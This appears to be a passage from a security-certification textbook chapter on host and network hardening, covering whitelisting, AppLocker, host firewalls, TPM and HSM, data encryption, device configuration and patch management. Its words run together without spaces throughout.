WhiteListingvs.BlackListingApplicationsApplicationscanbecontrolledattheOSatthetimeofstartviablacklistingorwhitelisting.Blacklistingisessentiallynotingwhichapplicationsshouldnotbeallowedtorunonthemachine.Thisisbasicallyapermanent“ignore”or“callblock”typecapability.Whitelistingistheexactopposite:itconsistsofalistofallowedapplications.Eachoftheseapproacheshasadvantagesanddisadvantages.Blacklistingisdifficulttouseagainstdynamicthreats,astheidentificationofaspecificapplicationcaneasilybeavoidedthroughminorchanges.Whitelistingiseasiertoemployfromtheaspectoftheidentificationofapplicationsthatareallowedtorun—hashvaluescanbeusedtoensuretheexecutablesarenotcorrupted.Thechallengeinwhitelistingisthenumberofpotentialapplicationsthatarerunonatypicalmachine.Forasingle-purposemachine,suchasadatabaseserver,whitelistingcanberelativelyeasytoemploy.Formultipurposemachines,itcanbemorecomplicated.MicrosofthastwomechanismsthatarepartoftheOStocontrolwhich
userscanusewhichapplications:
SoftwarerestrictivepoliciesEmployedviagrouppoliciesandallowsignificantcontroloverapplications,scripts,andexecutablefiles.Theprimarymodeisbymachineandnotbyuseraccount.
UseraccountlevelcontrolEnforcedviaAppLocker,aservicethatallowsgranularcontroloverwhichuserscanexecutewhichprograms.Throughtheuseofrules,anenterprisecanexertsignificantcontroloverwhocanaccessanduseinstalledsoftware.
OnaLinuxplatform,similarcapabilitiesareofferedfromthird-partyvendorapplications.
AppLockerAppLockerisacomponentofWindows7andlaterthatenablesadministratorstoenforcewhichapplicationsareallowedtorunviaasetof
predefinedrules.AppLockerisanadjuncttoSoftwareRestrictionPolicies(SRP).SRPrequiredsignificantadministrationonamachine-by-machinebasisandwasdifficulttoadministeracrossanenterprise.AppLockerwasdesignedsotherulescanbedistributedandenforcedbyGPO.Theybothacttopreventtherunningofbothunauthorizedsoftwareandmalwareonamachine,butAppLockerissignificantlyeasiertoadminister.Figure14.15showstheAppLockerinterfaceinWindows7.SomeofthefeaturesthatareenabledviaAppLockerarerestrictionsbyuserandtheabilitytoruninanauditmode,whereresultsareloggedbutnotenforced,allowingsettingstobetestedbeforeuse.
•Figure14.15AppLockerinWindows7
TrustedOSATrustedOperatingSystemisonethatisdesignedtoallowmultilevelsecurityinitsoperation.ThisisfurtherdefinedbyitsabilitytomeetaseriesofcriteriarequiredbytheU.S.government.TrustedOSsareexpensivetocreateandmaintainbecauseanychangemusttypicallyundergoarecertificationprocess.ThemostcommoncriteriausedtodefineaTrustedOSistheCommonCriteriaforInformationTechnologySecurityEvaluation(abbreviatedasCommonCriteria,orCC),aharmonizedsecuritycriteriarecognizedbymanynations,includingtheUnitedStates,Canada,GreatBritain,andmostoftheEUcountries,aswellasothers.VersionsofWindows,Linux,mainframeOSs,andspecialtyOSshavebeenqualifiedtovariousCommonCriterialevels.
ExamTip:ThetermTrustedOperatingSystemisusedtorefertoasystemthathasmetasetofcriteriaanddemonstratedcorrectnesstomeetrequirementsofmultilevelsecurity.TheCommonCriteriaisoneexampleofastandardusedbygovernmentbodiestodeterminecompliancetoalevelofsecurityneed.
Host-basedFirewallsPersonalfirewallsarehost-basedprotectivemechanismsthatmonitorandcontroltrafficpassingintoandoutofasinglesystem.Designedfortheenduser,softwarefirewallsoftenhaveaconfigurablesecuritypolicythatallowstheusertodeterminewhichtrafficis“good”andisallowedtopassandwhichtrafficis“bad”andisblocked.Softwarefirewallsareextremelycommonplace—somuchsothatmostmodernOSscomewithsometypeofpersonalfirewallincluded.Linux-basedOSshavehadbuilt-insoftware-basedfirewalls(seeFigure
14.16)foranumberofyears,includingTCPWrappers,ipchains,andiptables.
•Figure14.16Linuxfirewall
TCPWrappersisasimpleprogramthatlimitsinboundnetworkconnectionsbasedonportnumber,domain,orIPaddressandismanagedwithtwotextfilescalledhosts.allowandhosts.deny.IftheinboundconnectioniscomingfromatrustedIPaddressanddestinedforaporttowhichitisallowedtoconnect,thentheconnectionisallowed.Ipchainsisamoreadvanced,rule-basedsoftwarefirewallthatallowsfor
trafficfiltering,NetworkAddressTranslation(NAT),andredirection.Threeconfigurable“chains”areusedforhandlingnetworktraffic:input,output,andforward.Theinputchaincontainsrulesfortrafficthatiscomingintothelocalsystem.Theoutputchaincontainsrulesfortrafficthatisleavingthelocalsystem.Theforwardchaincontainsrulesfortrafficthatwasreceivedbythelocalsystembutisnotdestinedforthelocalsystem.Iptablesisthelatestevolutionofipchains.Iptablesusesthesamethreechainsforpolicyrulesandtraffichandlingasipchains,butwithiptableseachpacketisprocessedonlybytheappropriatechain.Underipchains,eachpacketpassesthroughallthreechainsforprocessing.Withiptables,incomingpacketsareprocessedonlybytheinputchainandpacketsleavingthesystemareprocessedonlybytheoutputchain.Thisallowsformoregranularcontrolofnetworktrafficandenhancesperformance.Inadditiontothe“free”firewallsthatcomebundledwithOSs,many
commercialpersonalfirewallpackagesareavailable.ProgramssuchasZoneAlarmfromCheckPointSoftwareTechnologiesprovideorbundleadditionalcapabilitiesnotfoundinsomebundledsoftwarefirewalls.Manycommercialsoftwarefirewallslimitinboundandoutboundnetworktraffic,blockpop-ups,detectadware,blockcookies,blockmaliciousprocesses,andscaninstantmessengertraffic.Whileyoucanstillpurchaseorevendownloadafreesoftware-basedpersonalfirewall,mostcommercialvendorsarebundlingthefirewallfunctionalitywithadditionalcapabilitiessuchasantivirusandantispyware.MicrosoftWindowshashadapersonalsoftwarefirewallsinceWindows
XPSP2.WindowsFirewall(seeFigure14.17)isenabledbydefaultandhaswarningswhendisabled.WindowsFirewallisfairlyconfigurable;itcanbesetuptoblockalltraffic,makeexceptionsfortrafficyouwanttoallow,andlogrejectedtrafficforlateranalysis.
•Figure14.17WindowsFirewallisenabledbydefaultinXPSP2,Vista,andWindows7.
WiththeintroductionoftheVistaoperatingsystem,MicrosoftmodifiedWindowsFirewalltomakeitmorecapableandconfigurable.Moreoptionswereaddedtoallowformoregranularcontrolofnetworktrafficaswellastheabilitytodetectwhencertaincomponentsarenotbehavingasexpected.Forexample,ifyourMSOutlookclientsuddenlyattemptstoconnecttoaremotewebserver,WindowsFirewallcandetectthisasadeviationfromnormalbehaviorandblocktheunwantedtraffic.
HardwareSecurityHardware,intheformofservers,workstations,andevenmobiledevices,canrepresentaweaknessorvulnerabilityinthesecuritysystemassociatedwithanenterprise.Whilehardwarecanbeeasilyreplacediflostorstolen,theinformationthatiscontainedbythedevicescomplicatesthesecuritypicture.Dataorinformationcanbesafeguardedfromlossbybackups,butthisdoeslittleinthewayofprotectingitfromdisclosuretoanunauthorizedparty.Therearesoftwaremeasuresthatcanassistintheformofencryption,butthesealsohavedrawbacksintheformofscalabilityandkeydistribution.Therearesomehardwareprotectionmechanismsthatshouldbe
employedtosafeguardinformationinservers,workstations,andmobiledevices.Cablelockscanbeemployedonmobiledevicestopreventtheirtheft.Lockingcabinetsandsafescanbeusedtosecureportablemedia,USBdrives,andCDs/DVDs.PhysicalsecurityiscoveredinmoredetailinChapter8.
ExamTip:Physicalsecurityisanessentialelementofasecurityplan.Unauthorizedaccesstohardwareandnetworkingcomponentscanmakemanysecuritycontrolsineffective.
HostSoftwareBaseliningTosecurethesoftwareonasystemeffectivelyandconsistently,youmusttakeastructuredandlogicalapproach.Thisstartswithanexaminationofthesystem’sintendedfunctionsandcapabilitiestodeterminewhatprocessesandapplicationswillbehousedonthesystem.Asabestpractice,anythingthatisnotrequiredforoperationsshouldberemovedordisabledonthesystem;then,alltheappropriatepatches,hotfixes,andsettingsshouldbeappliedtoprotectandsecureit.Thisprocessofestablishingsoftware’sbasesecuritystateiscalled
baselining,andtheresultingproductisasecuritybaselinethatallowsthesoftwaretorunsafelyandsecurely.Softwareandhardwarecanbetiedintimatelywhenitcomestosecurity,sotheymustbeconsideredtogether.Oncetheprocesshasbeencompletedforaparticularhardwareandsoftwarecombination,anysimilarsystemscanbeconfiguredwiththesamebaselinetoachievethesamelevelanddepthofsecurityandprotection.Uniformsoftwarebaselinesarecriticalinlarge-scaleoperations,becausemaintainingseparateconfigurationsandsecuritylevelsforhundredsorthousandsofsystemsisfartoocostly.Afteradministratorshavefinishedpatching,securing,andpreparinga
system,theyoftencreateaninitialbaselineconfiguration.Thisrepresentsasecurestateforthesystemornetworkdeviceandareferencepointofthesoftwareanditsconfiguration.Thisinformationestablishesareferencethatcanbeusedtohelpkeepthesystemsecurebyestablishingaknownsafeconfiguration.Ifthisinitialbaselinecanbereplicated,itcanalsobeusedasatemplatewhendeployingsimilarsystemsandnetworkdevices.
Host-basedSecurityControlsSecuritycontrolscanbeimplementedonahostmachinefortheexpresspurposeofprovidingdataprotectiononthehost.Thissectionexploresmethodstoimplementtheappropriatecontrolstoensuredatasecurity.
Hardware-basedEncryptionDevicesHardware-basedencryptiondevicesaredesignedtoassistintheencryption/decryptionactionsviahardwareratherthansoftwareonasystem.Integrationofencryptionfunctionalityviahardwareoffersbothperformanceandsecurityadvantagesforthesesolutions.
TPMTheTrustedPlatformModule(TPM)isahardwaresolutiononthemotherboard,onethatassistswithkeygenerationandstorageaswellasrandomnumbergeneration.WhentheencryptionkeysarestoredintheTPM,theyarenotaccessiblevianormalsoftwarechannelsandarephysicallyseparatedfromtheharddriveorotherencrypteddatalocations.ThismakestheTPMamoresecuresolutionthanstoringthekeysonthemachine’snormalstorage.
HSMAhardwaresecuritymodule(HSM)isadeviceusedtomanageorstoreencryptionkeys.Itcanalsoassistincryptographicoperationssuchasencryption,hashing,ortheapplicationofdigitalsignatures.HSMsaretypicallyperipheraldevices,connectedviaUSBoranetworkconnection.HSMshavetamperprotectionmechanismstopreventphysicalaccesstothesecretstheyprotect.Becauseoftheirdedicateddesign,theycanoffersignificantperformanceadvantagesovergeneral-purposecomputerswhenitcomestocryptographicoperations.Whenanenterprisehassignificantlevelsofcryptographicoperations,HSMscanprovidethroughputefficiencies.
ExamTip:Storingprivatekeysanywhereonanetworkedsystemisarecipeforloss.HSMsaredesignedtoallowtheuseofthekeywithoutexposingittothewiderangeofhost-basedthreats.
USBEncryptionUniversalSerialBus(USB)offersaneasyconnectionmechanismtoconnectdevicestoacomputer.Thisactsasthemechanismoftransportbetweenthecomputerandanexternaldevice.WhendatatraversestheUSBconnection,ittypicallyendsuponaportabledeviceandthusrequiresanappropriatelevelofsecurity.Manymechanismsexist,fromencryptionontheUSBdeviceitself,toOS-enabledencryption,toindependentencryptionbeforemovingthedata.Eachofthesemechanismshasadvantagesanddisadvantages,anditisultimatelyuptotheusertochoosethebestmethodbasedonthesensitivityofthedata.
HardDriveAsharddrivesexisttostoreinformation,havingthedriveitselfofferencryptionservicescanprovideflexibilityintermsofperformanceandsecurity.ItispossibletobuyharddrivestodaywithintegratedAESencryption,sothatthedrivecontentissecuredandthekeyscanbestoredseparatelyinaTPM.Thisofferssignificantperformanceandsecurityenhancementsoverother,software-basedsolutions.
DataEncryptionDataencryptioncontinuestobethebestsolutionfordatasecurity.Properlyencrypted,thedataisnotreadablebyanunauthorizedparty.Therearenumerouswaystoenactthislevelofprotectiononahostmachine.
FullDiskFulldiskencryptionreferstotheactofencryptinganentirepartitioninoneoperation.Thenasspecificelementsareneeded,thoseparticularsectorscanbedecryptedforuse.Thisoffersasimpleconveniencefactorandensuresthatallofthedataisprotected.Itdoescomeataperformancecost,astheactofdecryptingandencryptingtakestime.Forsomehigh-
performancedatastores,especiallythosewithlatencyissues,thisperformancehitmaybecritical.Althoughbetterperformancecanbeachievedwithspecializedhardware,aswithallsecuritycontrolsthereneedstobeanevaluationoftheriskinvolvedversusthecosts.
DatabaseMajordatabaseengineshavebuilt-inencryptioncapabilities.Theadvantagetotheseencryptionschemesisthattheycanbetailoredtothedatastructure,protectingtheessentialcolumnswhilenotimpactingcolumnsthatarenotsensitive.Properlyemployingdatabaseencryptionrequiresthatthedataschemaanditssecurityrequirementsbedesignedintothedatabaseimplementation.Theadvantageisinbetterprotectionagainstanydatabasecompromise,andtheperformancehitistypicallynegligiblewithrespecttootheralternatives.
IndividualFilesIndividualfilescanbeencryptedaswellinasystem.ThiscanbedoneeitherattheOSlevelorviaathird-partyapplication.Managingindividualfileencryptioncanbetricky,astheproblemmovestoanencryptionkeysecurityproblem.Whenusingbuilt-inencryptionmethodswithanOS,thekeyissueisresolvedbytheOSitself,withasinglekeybeingemployedandstoredwiththeusercredentials.Oneoftheadvantagesofindividualfileencryptioncomeswhentransferringdatatoanotheruser.Transportingasinglefileviaanunprotectedchannelsuchase-mailcanbedonesecurelywithsingle-fileencryption.
RemovableMediaRemovablemedia,byitsverynature,canbemovedtoanotherlocation,makingthesecuringofthedatastoredonthedeviceessential.Again,encryptionbecomesthetoolofchoice,andawiderangeofencryptionmethodsandapplicationssupporttheprotectionofremovablemedia.MicrosoftBitLocker,builtintocurrenteditionsofitsEnterprise,Ultimate,
andProOSs,offerstheabilitytoprotectdatastoredonremovablemedia.
MobileDevicesMobiledevicesecurity,coveredindetailinChapter12,isalsoessentialwhencriticalorsensitivedataistransmittedtomobiledevices.Theprotectionofmobiledevicesgoesbeyondsimpleencryptionofthedata,asthedevicecanactasanauthorizedendpointforthesystem,openingupavenuesofattack.
DataSecurityDataorinformationisthemostimportantelementtoprotectintheenterprise.Equipmentcanbepurchased,replaced,andsharedwithoutconsequence;itistheinformationthatisbeingprocessedthathasthevalue.Datasecurityreferstotheactionstakenintheenterprisetosecuredata,whereveritresides:intransit,atrest,orinuse.
DatainTransitDatahasvalueintheenterprise,butfortheenterprisetofullyrealizethevalue,dataelementsneedtobesharedandmovedbetweensystems.Wheneverdataisintransit,beingmovedfromonesystemtoanother,itneedstobeprotected.Themostcommonmethodofthisprotectionisviaencryption.Whatisimportantistoensurethatdataisalwaysprotectedinproportiontothedegreeofriskassociatedwithadatasecurityfailure.
DataatRestDataatrestreferstodatabeingstored.Dataisstoredinavarietyofformats:infiles,indatabases,andasstructuredelements.WhetherinASCII,XML,JavaScriptObjectNotation(JSON),oradatabase,andregardlessofonwhatmediaitisstored,dataatreststillrequiresprotectioncommensuratewithitsvalue.Again,aswithdataintransit,encryptionisthebestmeansofprotectionagainstunauthorizedaccessoralteration.
DatainUseDataisprocessedinapplications,isusedforvariousfunctions,andcanbeatriskwheninsystemmemoryorevenintheactofprocessing.Protectingdatawhileinuseisamuchtrickierpropositionthanprotectingitintransitorinstorage.Whileencryptioncanbeusedintheseothersituations,itisnotpracticaltoperformoperationsonencrypteddata.Thismeansthatothermeansneedtobetakentoprotectthedata.Protectedmemoryschemesandaddressspacelayoutrandomizationaretwotoolsthatcanbeusedtopreventdatasecurityfailuresduringprocessing.Securecodingprinciples,includingthedefinitivewipingofcriticaldataelementsoncetheyarenolongerneeded,canassistinprotectingdatainuse.
ExamTip:Understandingtheneedtoprotectdatainallthreephases,intransit,atrest,andinuse,isanimportantconceptfortheexam.Thefirststepistoidentifythephasethedataisin,andthesecondistoidentifythecorrectmeansofprotectionforthatphase.
HandlingBigDataBigdataistheindustrybuzzwordforverylargedatasetsbeingusedinmanyenterprises.Datasetsinthepetabyte,exabyte,andevenzettabyterangearenowbeingexploredinsomeapplications.Datasetsofthesesizesrequirespecialhardwareandsoftwaretohandlethem,butthisdoesnotalleviatetheneedforsecurity.Planningforsecurityonthisscalerequiresenterprise-levelthinking,butitisworthnotingthateventuallysomesubsetoftheinformationmakesitswaytoahostmachineforuse.Itisatthispointthatthedataisvulnerable,becausewhateverprotectionschemeisinplaceonthelargestoragesystem,thedataisoutsidethatrealmnow.Thismeansthatlocalprotectionmechanisms,suchasprovidedbyKerberos-basedauthentication,canbecriticalinmanagingthistypeofprotectionscheme.
CloudStorageCloudcomputingistheuseofonlineresourcesforstorage,processing,orboth.Whenstoringdatainthecloud,encryptioncanbeusedtoprotectthedata,sothatwhatisactuallystoredisencrypteddata.Thisreducestheriskofdatadisclosurebothintransittothecloudandbackaswellaswhileinstorage.
StorageAreaNetworkAstorageareanetwork(SAN)isameansofstoringdataacrossasecondarydedicatednetwork.SANsoperatetoconnectdatastoragedevicesasiftheywerelocalstorage,yettheyareseparateandcanbecollectionsofdisks,tapes,andotherstoragedevices.BecausethededicatednetworkisseparatefromthenormalIPnetwork,accessingtheSANrequiresgoingthroughoneoftheattachedmachines.ThismakesSANsabitmoresecurethanotherformsofstorage,althoughlossthroughacompromisedclientmachineisstillarisk.
Permissions/ACLAccesscontrollists(ACLs)formoneofthefoundationalbasesforsecurityonamachine.ACLscanbeusedbytheoperatingsystemtomakedeterminationsastowhetherornotausercanaccessaresource.ThislevelofpermissionrestrictionofferssignificantprotectionofresourcesandtransfersthemanagementoftheaccesscontrolproblemtothemanagementofACLs,asmallerandmoremanageableproblem.
NetworkHardeningWhileconsideringthebaselinesecurityofsystems,youmustconsidertherolethenetworkconnectionplaysintheoverallsecurityprofile.ThetremendousgrowthoftheInternetandtheaffordabilityofmultiplePCs
andEthernetnetworkinghaveresultedinalmosteverycomputerbeingattachedtosomekindofnetwork,andoncecomputersareattachedtoanetwork,theyareopentoaccessfromanyotheruseronthatnetwork.Propercontrolsovernetworkaccessmustbeestablishedoncomputersbycontrollingtheservicesthatarerunningandtheportsthatareopenedfornetworkaccess.Inadditiontoserversandworkstations,however,networkdevicesmustalsobeexamined:routers,switches,andmodems,aswellasvariousothercomponents.Thesenetworkdevicesshouldbeconfiguredwithverystrictparameters
tomaintainnetworksecurity.LikenormalcomputerOSsthatneedtobepatchedandupdated,thesoftwarethatrunsnetworkinfrastructurecomponentsneedstobeupdatedregularly.Finally,anouterlayerofsecurityshouldbeaddedbyimplementingappropriatefirewallrulesandrouterACLs.
CrossCheckNetworkDevices,NAT,andSecurityChapter9discussedNAT(NetworkAddressTranslation).HowdonetworkdevicesthatperformNATserviceshelpsecureprivatenetworksfromInternet-basedattacks?
SoftwareUpdatesMaintainingcurrentvendorpatchlevelsforyoursoftwareisoneofthemostimportantthingsyoucandotomaintainsecurity.Thisisalsotruefortheinfrastructurethatrunsthenetwork.Whilesomeequipmentisunmanagedandtypicallyhasnonetworkpresenceandfewsecurityrisks,anymanagedequipmentthatisrespondingonnetworkportswillhavesomesoftwareorfirmwarecontrollingit.Thissoftwareorfirmwareneedstobeupdatedonaregularbasis.ThemostcommondevicethatconnectspeopletotheInternetisthe
networkrouter.Dozensofbrandsofroutersareavailableonthemarket,butCiscoSystemsproductsdominate.ThepopularCiscoInternetwork
OperatingSystem(IOS)runsonmorethan70ofCisco’sdevicesandisinstalledcountlesstimesatcountlesslocations.Itspopularityhasfueledresearchintovulnerabilitiesinthecode,andoverthepastfewyearsquiteafewvulnerabilitieshavebeenreported.Thesevulnerabilitiescantakemanyformsbecauserouterssendandreceiveseveraldifferentkindsoftraffic,fromthestandardTelnetremoteterminal,toroutinginformationintheformofRoutingInformationProtocol(RIP)orOpenShortestPathFirst(OSPF)packets,toSimpleNetworkManagementProtocol(SNMP)packets.ThishighlightstheneedtoupdatetheCiscoIOSsoftwareonaregularbasis.
WhilewefocusonCiscoinourdiscussion,it’simportanttonotethateverynetworkdevice,regardlessofthemanufacturer,needstobemaintainedandpatchedtoremainsecure.
CiscoIOSalsorunsonmanyofitsEthernetswitchingproducts.Likerouters,thesehavecapabilitiesforreceivingandprocessingprotocolssuchasTelnetandSNMP.SmallernetworkcomponentsdonotusuallyrunlargesoftwaresuitesandtypicallyhavesmallersoftwareloadedoninternalnonvolatileRAM(NVRAM).Whiletheupdateprocessforthiskindofsoftwareistypicallycalledafirmwareupdate,thisdoesnotchangethesecurityimplicationsofkeepingituptodate.Inthecaseofacorporatenetworkwithseveraldevices,someonemusttakeownershipofupdatingthedevices,andupdatesmustbeperformedregularlyaccordingtosecurityandadministrationpolicies.
DeviceConfigurationAsimportantasitistokeepsoftwareuptodate,properlyconfiguringnetworkdevicesisequally,ifnotmore,important.Manynetworkdevices,suchasroutersandswitches,nowhaveadvancedremotemanagementcapabilities,withmultipleopenportsacceptingnetworkconnections.
Properconfigurationisnecessarytokeepthesedevicessecure.Choosingagoodpasswordisveryimportantinmaintainingexternalandinternalsecurity,andclosingorlimitingaccesstoanyopenportsisalsoagoodstepforsecuringthedevices.Onthemoreadvanceddevices,youmustcarefullyconsiderwhatservicesthedeviceisrunning,justaswithacomputer.Herearesomegeneralstepstotakewhensecuringnetworkingdevices:
LimitaccesstoonlythosewhoneeditIfyournetworkingdeviceallowsmanagementviaawebinterface,SSH,oranyothermethod,limitwhocanconnecttothoseservices.ManynetworkingdevicesallowyoutospecifywhichIPaddressesareallowedtoconnecttothosemanagementservices.
ChoosegoodpasswordsAlwayschangedefaultpasswordsandfollowgoodpasswordselectionguidelines.Ifthedevicesupportsencryption,ensurepasswordsarestoredinencryptedformatonthedevice.
Password-protectconsoleandremoteaccessIfthedevicesupportspasswordprotection,ensurethatalllocalandremoteaccesscapabilitiesarepasswordprotected.
TurnoffunnecessaryservicesIfyournetworkingequipmentsupportsTelnetbutyourorganizationdoesn’tneedit,turnthatserviceoff.It’salwaysagoodideatodisableorremoveunusedservices.YourdevicemayalsosupporttheuseofACLstolimitaccesstoservicessuchasTelnetorSSHonthedeviceitself.
ChangeSNMPcommunitystringsSNMPiswidelyusedtomanagenetworkingequipmentandtypicallyallowsa“public”string,whichcantypicallyonlyreadinformationfromadevice,anda“private”string,whichcanoftenreadandwritetoadevice’sconfiguration.Somemanufacturersusedefaultorwell-knownstrings(suchas“public”forthepublicstring)—alwayschangeboththepublicandprivatestringsifyouareusingSNMP.
ExamTip:Theuseoftheword“public”asanSNMPcommunitystringisanextremelywell-knownvulnerability.AnysystemusinganSNMPcommunitystringof“public”shouldbechangedimmediately.
SecuringManagementInterfacesSomenetworksecuritydeviceswillhave“managementinterfaces”thatallowforremotemanagementofthedevicesthemselves.Oftenseenonfirewalls,routers,andswitches,amanagementinterfaceallowsconnectionstothedevice’smanagementapplication,anSSHservice,orevenaweb-basedconfigurationGUI,whicharenotallowedonanyotherinterface.Duetothishighlevelofaccess,managementinterfacesandmanagementapplicationsmustbesecuredagainstunauthorizedaccess.Theyshouldnotbeconnectedtopublicnetworkconnections(theInternet)andDMZconnections.Wherepossible,accesstomanagementinterfacesandapplicationsshouldberestrictedwithinanorganizationsoemployeeswithouttheproperaccessrightsandprivilegescannotevenconnecttothoseinterfacesandapplications.
VLANManagementAvirtualLAN,orVLAN,isagroupofhoststhatcommunicateasiftheywereonthesamebroadcastdomain.AVLANisalogicalconstructthatcanbeusedtohelpcontrolbroadcastdomains,managetrafficflow,andrestricttrafficbetweenorganizations,divisions,andsoon.Layer2switches,bydefinition,willnotbridgeIPtrafficacrossVLANs,whichgivesadministratorstheabilitytosegmenttrafficquiteeffectively.Forexample,ifmultipledepartmentsareconnectedtothesamephysicalswitch,VLANscanbeusedtosegmentthetrafficsuchthatonedepartmentdoesnotseethebroadcasttrafficfromtheotherdepartments.BycontrollingthemembersofaVLAN,administratorscanlogically
separatenetworktrafficthroughouttheorganization.
IPv4vs.IPv6IPv4(InternetProtocolversion4)isthedefactocommunicationstandardinuseonalmosteverynetworkaroundtheplanet.Unfortunately,IPv4containssomeinherentshortcomingsandvulnerabilities.Inanefforttoaddresstheseissues,theInternetEngineeringTaskForce(IETF)launchedanefforttoupdateorreplaceIPv4;theresultisIPv6.Usinganewpacketformatandmuchlargeraddressspace,IPv6isdesignedtospeeduppacketprocessingbyroutersandsupply3.4×1038possibleaddresses(IPv4usesonly32bitsforaddressing;IPv6uses128bits).Additionally,IPv6hassecurity“builtin”withmandatorysupportfornetworklayersecurity.AlthoughwidelyadoptedunderIPv4,IPsecsupportismandatoryinIPv6.Theissuenowisoneofconversion.IPv4andIPv6networkscannottalkdirectlytoeachotherandmustrelyonsometypeofgateway.ManyoperatingsystemsanddevicescurrentlysupportdualIPstacksandcanrunbothIPv4andIPv6.WhileadoptionofIPv6isproceeding,itismovingslowlyandhasyettogainasignificantfoothold.
ExamTip:A“hotfix”isdesignedtoaddress/fixaspecificproblem—abufferoverflowinaspecificapplication,forexample.Apatchisusuallyacollectionofoneormorefixes.
Someapplication“patches”containneworenhancedfunctionsandsomechangeuser-definedsettingsbacktodefaultsduringinstallationofthepatch.Ifyouaredeployinganapplicationpatchacrossalargegroupofusers,itisimportanttounderstandexactlywhatthatapplicationpatchreallydoes.Patchesshouldfirstbetestedinanonproductionenvironmentbeforedeploymenttodetermineexactlyhowtheyaffectthesystemandthenetworkitisconnectedto.
ApplicationHardeningPerhapsasimportantasOSandnetworkhardeningisapplicationhardening—securinganapplicationagainstlocalandInternet-basedattacks.Hardeningapplicationsisfairlysimilartohardeningoperatingsystems—youremovethefunctionsorcomponentsyoudon’tneed,restrictaccesswhereyoucan,andmakesuretheapplicationiskeptuptodatewithpatches.Inmostcases,thelaststepinthatlististhemostimportantformaintainingapplicationsecurity.Afterall,applicationsmustbeaccessibletousersortheyservenopurpose.Asmostproblemswithapplicationstendtobebufferoverflowsinlegitimateuserinputfields,patchingtheapplicationisoftentheonlywaytosecureitfromattack.
TechTip
PortScannersTofindoutwhatservicesareopenonagivenhostornetworkdevices,manyadministratorswilluseatoolcalledaportscanner.AportscannerisatooldesignedtoproberemotesystemsforopenTCPandUDPservices.Nmapisaverypopular(andfree)portscanner(seehttp://nmap.org).
ApplicationConfigurationBaselineAswithoperatingsystems,applications(particularlythoseprovidingpublicservicessuchaswebserversandmailservers)willhaverecommendedsecurityandfunctionalitysettings.Insomecases,vendorswillprovidethoserecommendsettings,and,inothercases,anoutsideorganizationsuchasNSA,ISSA,orSANSwillproviderecommendedconfigurationsforpopularapplications.Manylargeorganizationswilldeveloptheirownapplicationconfigurationbaseline—thatlistofsettings,tweaks,andmodificationsthatcreatesafunctionalandhopefullysecureapplicationforusewithintheorganization.Developinganapplicationbaselineandusingitanytimethatapplicationisdeployedwithinthe
organizationhelpstoensureaconsistent(andhopefullysecure)configurationacrosstheorganization.
ApplicationPatchesAsobviousasthisseems,applicationpatchesaremostlikelygoingtocomefromthevendorthatsellstheapplication.Afterall,whoelsehasaccesstothesourcecode?Insomecases,suchaswithMicrosoft’sIIS,thisisthesamecompanythatsoldtheOSthattheapplicationrunson.Inothercases,suchasApache,thevendorisOSindependentandprovidesanapplicationwithversionsformanydifferentOSs.Applicationpatchesarelikelytocomeinthreevarieties:hotfixes,
patches,andupgrades.AsdescribedforOSsearlierinthechapter,hotfixesareusuallysmallsectionsofcodedesignedtofixaspecificproblem.Forexample,ahotfixmayaddressabufferoverflowintheloginroutineforanapplication.Patchesareusuallycollectionsoffixes,tendtobemuchlarger,andareusuallyreleasedonaperiodicbasisorwheneverenoughproblemshavebeenaddressedtowarrantapatchrelease.Upgradesareanotherpopularmethodofpatchingapplications,andtheytendtobepresentedwithamorepositivespinthanpatches.Eventhetermupgradehasapositiveconnotation—youaremovinguptoabetter,morefunctional,andmoresecureapplication.Forthisreason,manyvendorsrelease“upgrades”thatconsistmainlyoffixesratherthanneworenhancedfunctionality.
ExamTip:Patchmanagementistheprocessofplanning,testing,anddeployingpatchesinacontrolledmanner.
PatchManagementIntheearlydaysofnetworkcomputing,thingswereeasy—fewer
applicationsexisted,vendorpatchescameoutannuallyorquarterly,andaccesswasrestrictedtoauthorizedindividuals.Updateswerefewandeasytohandle.NowapplicationandOSupdatesarepushedconstantlyasvendorsstruggletoprovidenewcapabilities,fixproblems,andaddressvulnerabilities.Microsoftcreated“PatchTuesday”inanefforttocondensetheupdatecycleandreducetheeffortrequiredtomaintainitsproducts,andhasnowgonetocontinuouspatchingofitsnewestOS.Asthenumberofpatchescontinuestorise,manyorganizationsstruggletokeepupwithpatches—whichpatchesshouldbeappliedimmediately,whicharecompatiblewiththecurrentconfiguration,whichwillnotaffectcurrentbusinessoperations,andsoon.Tohelpcopewiththisfloodofpatches,manyorganizationshaveadoptedpatchmanagement,theprocessofplanning,testing,anddeployingpatchesinacontrolledmanner.Patchmanagementisadisciplinedapproachtotheacquisition,testing,
andimplementationofOSandapplicationpatchesandrequiresafairamountofresourcestoimplementproperly.Toimplementpatchmanagementeffectively,youmustfirsthaveagoodinventoryofthesoftwareusedinyourenvironment,includingallOSsandapplications.Thenyoumustsetupaprocesstomonitorforupdatestothosesoftwarepackages.Manyvendorsprovidetheabilitytoupdatetheirproductsautomaticallyortoautomaticallycheckforupdatesandinformtheuserwhenupdatesareavailable.Keepingtrackofpatchavailabilityismerelythefirststep;inmany
environments,patchesmustbeanalyzedandtested.Doesthepatchapplytothesoftwareyouarerunning?Doesthepatchaddressavulnerabilityorcriticalissuethatmustbeaddressedimmediately?Whatistheimpactofapplyingthatpatchorgroupofpatches?Willitbreaksomethingelseifyouapplythispatch?Toaddresstheseissues,itisrecommendedthatyouusedevelopmentortestplatforms,whereyoucancarefullyanalyzeandtestpatchesbeforeplacingthemintoaproductionenvironment.Whilepatchesaregenerally“good,”theyarenotalwaysexhaustivelytested;somehavebeenknownto“break”otherproductsorfunctionswithintheproductbeingpatched;andsomehaveintroducednewvulnerabilities
whileattemptingtoaddressanexistingvulnerability.Theextentofanalysisandtestingvarieswidelyfromorganizationtoorganization.TestingandanalysiswillalsovarydependingontheapplicationorOSandtheextentofthepatch.
TechTip
Patch-ManagementSolutionsKeepingtrackofcurrentpatchlevelsinasystemorgroupofsystemscanbeadauntingjob.Thereareavarietyofsoftwaresolutionstoassistadministratorsinthistask.OneoftheseprogramsisSecuniaPersonalSoftwareInspector(PSI),http://secunia.com.Thisprogram,whichisfreeforpersonaluse,willtrackupdatesforapplicationsinstalledonamachine.
•SecuniaPersonalSoftwareInspectorresultsscreen
